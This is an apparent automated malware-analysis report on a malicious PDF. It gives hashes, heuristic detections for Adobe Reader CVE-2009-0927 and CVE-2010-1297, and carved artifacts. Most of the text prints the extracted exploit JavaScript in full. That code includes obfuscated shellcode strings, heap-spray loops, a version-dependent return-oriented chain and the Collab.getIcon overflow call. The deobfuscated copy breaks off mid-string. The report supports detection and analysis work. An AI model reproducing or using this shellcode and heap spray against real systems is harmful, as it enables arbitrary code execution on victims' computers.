Malicious PDF — malware analysis report

Static analysis result for SHA-256 4b74234b4fd3d1e2…

MALICIOUS

PDF

94.9 KB Created: 2011-04-19 14:23:41 +08:00 Authoring application: Acrobat PDFMaker 9.0 Word 版 (via Acrobat Distiller 9.0.0 (Windows)) First seen: 2013-06-22
MD5: 4eed0fde43d1bbf59865e05260796eb4 SHA-1: 18de5f8b30b3348975b28016cfd961ec74cc6b4c SHA-256: 4b74234b4fd3d1e24685905dd31aee3c18849366a948becb491158bab3385401
336 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Adobe Flash authplay SWF exploit in PDF — CVE-2010-1297 critical CVE likely CVE_2010_1297_FLASH_RICHMEDIA
    PDF combines RichMedia Flash activation, a crafted SWF with ActionScript prototype/AVM-era markers or the AES-PHP/authplay variant markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-1297 in Adobe Reader's bundled authplay.dll.
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • RichMedia (Flash) high PDF_RICHMEDIA
    PDF contains /RichMedia (Adobe Flash) which is a historic exploit vector
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdfx/1.3/In PDF document text

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
8.swf pdf-embedded-file PDF EmbeddedFile object 37 at offset 0x14E94 2557 bytes
SHA-256: af2817c681ef85dda82ef9278f19b98af6decb7d8421d85ee654995e5b5a37b6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=SWF; declared_or_context_type=PDF; filename=8.swf; kind=pdf-embedded-file
javascript_obj0027_000.js pdf-javascript-stream PDF /JS object 27 at offset 0x13F7D 10612 bytes
SHA-256: 7f6a3e06070c251e1a7afb8836cf4377932e58d3f4643e89f2742cec873b6798
Preview script
First 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes=unescape
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo";

function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret =""
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret = ret+util[strTempA](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
sc1=unes("\x25\x75\x30\x43\x30\x63\x25\x75\x31\x31\x65b\x25\x755bfc\x25\x75334b%u66c9%u2eb9%u8003" +
"\x25\x750b34\x25\x75e28f\x25\x75ebfa\x25\x75e805\x25\x75ffeb\x25\x75ffff\x25\x75bf67\x25\x758f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" )
;

sc2=unes("%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" 
)
sc3=unes("%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" 
)
sc4=unes("%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;

function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}

if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH =	  unescape	
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;

var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH("%\x75\x30C\x30\x43\x25u\x30\x430\x43%u4919%u0700\x25\x7512bb\x25\x750700%u1022%u0700%\x75\x30C\x30\x43\x25u\x30\x430\x43" +
"%\x75\x30C\x30\x43\x25u\x30\x430\x43%u1599%u0700%u0124%u0001%u72f7%u0700" +
"%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700" +
"%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700" +
"%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001" +
"%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700" +
"%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000" +
"%u0104%u0001%u1000%u0000%u0040%u0000"+
"%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722"+
"%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700"+
"%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb"+
"\x25\x750700%\x75\x30C\x30\x43\x25u\x30\x430\x43\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ee75\x25\x7505eb\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700"+
"\x25\x75e6e8\x25\x75ffff\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x7590ff\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090"+
"\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x759090\x25\x759090\x25\x75154d\x25\x750700\x25\x75a722\x25\x750700\x25\x7515bb\x25\x750700\x25\x75ffff\x25\x7590ff"+
"%u154d%u0700%ud731%u0700%u112f%u0700"+
"%u3030%u3030\x25\x75\x30\x43\x30\x63\x25\x75\x31\x31\x65b\x25\x755bfc\x25\x75334b%u66c9%u2eb9%u8003" +
"\x25\x750b34\x25\x75e28f\x25\x75ebfa\x25\x75e805\x25\x75ffeb\x25\x75ffff\x25\x75bf67\x25\x758f8f" +
"%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18" +
"%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05" +
"%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36" +
"%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5" +
"%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5" +
"%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f" +
"%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804" +
"%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764" +
"%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f" +
"%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63" +
"%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa" +
"%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9" +
"%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70" +
"%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" +
"%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02" +
"%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa" +
"%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f" +
"%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04" +
"%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca" +
"%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d" +
"%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f" +
"%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070" +
"%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137" +
"%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b" +
"%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2" +
"%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d" +
"%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" +
"%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07" +
"%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f" +
"%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f" +
"%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e" +
"%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b" +
"%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80" +
"%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66" +
"%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64" +
"%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70" +
"%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e" +
"%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70" +
"%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8" +
"%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" +
"%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6" +
"%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848" +
"%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83" +
"%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f" +
"%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df" +
"%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb" +
"%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04" +
"%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240" +
"%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964" +
"%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d" +
"%u064f%ud065%ud2d1%u4dd4%u8f87");
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH("\x25"+ "\x75" + "0" + "C" + "0" + "C" + "\x25u" + "0" + "C" + "0" + "C");
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536) 
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2)   //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<496;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp8();

}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 27 at offset 0x13F7D 9290 bytes
SHA-256: af49d109efc19083097e555c2b4342b12c72a51df8e0de0fcde0a8c5f42d504d
Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely
15 of 23 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var sc
for(i=0;i<18000;i++)
sc=sc+0x60
var unes=unescape
var strTempA="\x62\x79\x74e\x54\x6f\x43\x68\x61\x72";
var strTempB="g\x65t\x49\x63\x6f\x6e";
var strTempC="c\x6fll\x65\x63\x74\x45\x6d\x61\x69lInfo";

function rep(count,what){
          var v = "";
          while (--count >= 0) v += what;
          return v;
}
function myunes(buf) {
          var ret =""
          for (var x=0;x < buf["\x6c\x65\x6e\x67\x74\x68"]; x+=2) {
                  ret = ret+util[strTempA](Number('0x'+buf["\x73\x75\x62\x73\x74\x72"](x,2)));//
          }
          return ret;
}
sc1=unes("%u0C0c%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68" )
;

sc2=unes("%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f" 
)
sc3=unes("%u8f8f%udb05%u71c7%ufb05%u70c7%ufb07%u71c7%udb07%u70c7%u616d%ud870%u7093%u47fa%ud870%ue59f%u028f%u370a%u7071%udf70%ud870%u70af%uabd8%uca06%u065f%u0649%u0e48%u7046%u7070%ube70%u7d4f%u7821%uc65e%uc206%u0243%u3732%u7071%u0770%u808b%u05c6%u818b%uadb3%u90fa%u05c6%u818b%uadb3%u88fb%ucb07%u8e80%u64c6%u8e7d%u0e40%u8d48%u8f8f%u068f%u4ff2%u9c66%u8f8f%u058f%u818b%uafb3%u89fb%u8b07%uc680%u7c64%u408e%u06c8%u4ff2%ufa70%ue57f%u04cf%u73da%udd70%u0683%u5bca%u4806%ufa04%u8c67%u6ffa%u518e%u490e%u9d93%u8f8f%uc204%u7c6b%u042b%u73f2%u8fe5%ufa70%u704f%u97d8%uca06%ub24b%u7070%u7070%ud4fb%u06d8%u704c%u7ffa%ufa70%udf5b%ud870%udc93%ud870%u049f" 
)
sc4=unes("%u4ff2%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u3202%u7237%u7070%u8848%ue2ec%ua1eb%uc848%uea8b%ueaf7%u48af%u87c8%ueca0%uadaf%u480e%u8f83%u8f8f%u2b7c%u49c0%uad88%u49c8%u8f88%ue5d0%u028f%u370a%u7072%udf70%ud870%u70af%ua7d8%u8fe5%u70df%ua3d8%udadc%ud8d9%ue304%u97ab%uca04%u04b3%u8adb%u8ef7%u0465%u97c5%ud504%u8eaf%u6c64%uc6bd%ubb04%u8e04%ube61%u7370%u4fbe%ub723%ufb6f%u4e88%u8240%u488e%u7d64%uf3b4%u9bab%u6efa%ud504%u8eab%ue964%u8304%u04c4%u93d5%u648e%u8b04%u8e04%u6467%ube8d%u064f%ud065%ud2d1%u4dd4%u8f87");
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;

function exp8() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}

if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH =	  unescape	
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;

var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH("%u0C0C%u0C0C%u4919%u0700%u12bb%u0700%u1022%u0700%u0C0C%u0C0C%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u3030%u3030%u0C0c%u11eb%u5bfc%u334b%u66c9%u2eb9%u8003" +
"%u0b34%ue28f%uebfa%ue805%uffeb%uffff%ubf67%u8f8f%u228f%uf214%u2350%u5587%u99f9%u75ea%u639f%u8c18%u7483%u7218%ubc80%u0545%u65d4%u05c6%u5667%uac05%u1766%u0571%uff81%u60fc%u69b9%u0098%u0cf4%u3a36%ud4f7%u06da%u0e6a%uc763%u8f8d%u068f%u73d2%ubfe5%uebd6%u8e04%ucf04%u0483%u93ff%u0422%u87d7%u83e5%u04d6%u73f2%udcde%ufb70%u7300%ufc67%u8f8d%ud68f%ucb06%u7300%u616d%u8ee5%u02d1%u7bca%ud9df%u8804%u5f70%uca06%ub27f%u7070%u7070%u8bfa%ud9c9%u6764%u8fb2%u8faf%uf88f%uc98b%u64d9%ue552%ue58f%ue78f%u9d8f%u8f8f%u04d9%u8bc8%u5f70%u8fe5%uca02%udf63%u87e5%uca02%udf37%u04d9%u87c8%u5f70%u4f0a%u8bfa%ud9c9%u3b64%uf20e%udf37%udfeb%ufbcb%uc98b%u64d9%u0e28%u33f2%u7160%u2165%u8bfb%ud9c9%u1564%ufa70%ue57f%u70cf%u83d8%uca06%u0a57%ufa4f%u668a%u8e68%u8f8f%u8fe5%u8fe5%u8fe5%u70d9%u8bd8%u8fe5%uca02%udf63%ufa70%u707f%u57fa%u70d9%u87d8%u4f0a%u8afa%u4b66%u8f8e%ud98f%ud870%u049f%u57d2%u0c04%u9d9f%u8f8f%uca06%u0467%u9b0c%u8f9d%u068f%u6bca%u0c04%u9d97%u8f8f%uca06%u8c6f%u6bca%uca8c%u0667%u53ca%u05c7%u8c1b%u9d93%u8f8f%u4dbf%u1b07%u938c%u8f9d%u0a8f%uf84f%u0264%u370a%u7071%udf70%u77e7%u8f8f%u708f%u9bd8%u3402%u9d93%u8f8f%u460e%u7070%u7070%u4fbe%u217d%u5e78%u40a6%u7106%u4506%u3202%u7137%u7070%u460e%u7070%u7070%u217d%u06c0%u7c5e%ue52b%u028d%u370a%u7071%udf70%uf204%u7073%u97d8%u70b2%u7070%ufa70%u668a%u8ea0%u8f8f%uca06%u0647%u704d%u67fa%u0c02%u9d93%u8f8f%uca8c%udf6f%u36dd%u8e8f%u8f8f%udb05%u71c7%u